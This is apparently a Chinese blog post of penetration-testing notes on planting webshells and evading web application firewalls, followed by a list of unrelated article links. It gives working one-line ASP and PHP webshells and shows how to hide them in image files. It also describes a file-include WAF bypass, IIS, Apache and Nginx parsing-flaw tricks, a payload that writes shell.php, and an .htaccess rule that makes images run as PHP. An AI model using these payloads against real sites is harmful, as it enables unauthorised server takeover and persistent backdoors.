• 渗透:WAF&木马


    一句话木马

    asp:<%eval request("heroes")%>

    php:<?php @eval($_POST[value]);?>

    asp:<%@ Page Language="Jscript"%>

           <%eval(Request.Item["value"])%>

    一句话木马制作:

    c32:把图片放入里边,再写入一句话

    cmd:copy /b 1.jpg+1.asp 2.jpg

    win7下右键图片,在属性->详细信息->版权内插入一句话

    小马体积小,容易隐藏,与图片结合一起上传后可以利用nigx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。

    大马体积比较大,一般50K以上。功能丰富,一般包含提权命令,磁盘管理,数据库连接接口,执行命令,有些甚至可以压缩/解压缩网站程序。这种马的隐蔽性较差,大多数代码如果不加密的话会被杀。

    文件包含绕过waf

    1,上传包含文件bao.asp:<!--include file="1.jpg"--> 将当前文件目录下1.jpg包含到asp中执行

    2,上传图片文件1.jpg:其中其实是木马

    waf不会发现1.jpg中的内容,也不会对包含文件进行拦截,因为其中没有恶意代码。

    文件解析漏洞

    一些特殊文件被iis、apache、nginx在某种情况下被解释成脚本文件的漏洞。

    IIS5.x-6.0解析漏洞

    1,目录解析:/xx.asp/1.jpg

    在网站文件夹下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都会被IIS当成asp文件来解释或执行

    2,文件解析:cracer.asp;.jpg

    在IIS6.0下,分号后边的不被解析。除了asp之外还有.asa/.cer/.cdx

    Apache解析漏洞

    Apache从右向左开始判断解析,如果为不可识别解析,就再往左判断。比如cracer.php.owf.rar,“.owf”和".rar"Apache不能识别,于是就会最终解析成cracer.php

    IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞

    在默认Fast-CGI开启的状况下,上传一个名为cracer.jpg的文件,其中内容为<? PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问cracer.jpg/.php,在这个目录下就会生成一句话木马shell.php

    www.xxx.com/logo.gif/*.php触发漏洞(有漏洞会把前面文件当成php执行)

    htaccess文件解析

    如果在Apache中,.htaccess可被执行且可被上传,则可以尝试在其中写入:

    <FilesMatch "shell.jpg">  SetHandler application/x-httpd-php  </FilesMatch>

    然后再上传shell.jpg木马,这样就可以将其解析成.php文件

  • 相关阅读:
    剑指offer---尾到头打印链表
    剑指offer---链表中环的入口结点
    剑指offer---删除链表中重复的结点2
    剑指offer---删除链表中重复的结点
    6.shap以及selector的使用
    7.进度条(ProgressBar)
    5.toogleButton以及Switch
    4.基础控件
    3.触摸事件
    2.点击事件和页面切换
  • 原文地址:https://www.cnblogs.com/bl8ck/p/9520956.html
Copyright © 2020-2023  润新知